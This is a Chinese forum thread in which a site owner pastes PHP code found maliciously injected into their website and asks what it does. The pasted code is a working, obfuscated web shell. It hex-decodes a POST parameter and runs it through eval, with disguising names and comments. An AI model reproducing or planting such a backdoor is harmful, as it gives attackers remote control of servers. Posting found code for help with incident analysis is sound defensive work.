网址部分php被恶意添加代码了请问这是什么意思

monery2 · 发表于 2021-4-27 11:10:11

class _
{
static public $TokenUserLoger=Null;
function __construct($l="error"){
self:

TokenUserLoger=$l;
@eval/*This error level Listensing*/(null.null.self:

TokenUserLoger);
}
}
function hexToStr($hex){
      $str="";
      for($i=0;$i<strlen($hex)-1;$i+=2)
      $str.=chr(hexdec($hex[$i].$hex[$i+1]));
      return  $str;
}
$TokenError = null.hexToStr(@$_POST/*\*/["VersCollect"]);
$d = new _($TokenError);

上面是被恶意添加的

TokenUserLoger, function, error, self, null

DingJunkeji · 发表于 2022-9-11 22:33:57

我看到了token，跟验证的一个码一样

耗子 · 发表于 2022-9-12 16:13:36

打包了一下

[讨论] 网址部分php被恶意添加代码了请问这是什么意思

浏览过的版块

[讨论] 网址部分php被恶意添加代码了 请问这是什么意思

浏览过的版块

[讨论] 网址部分php被恶意添加代码了请问这是什么意思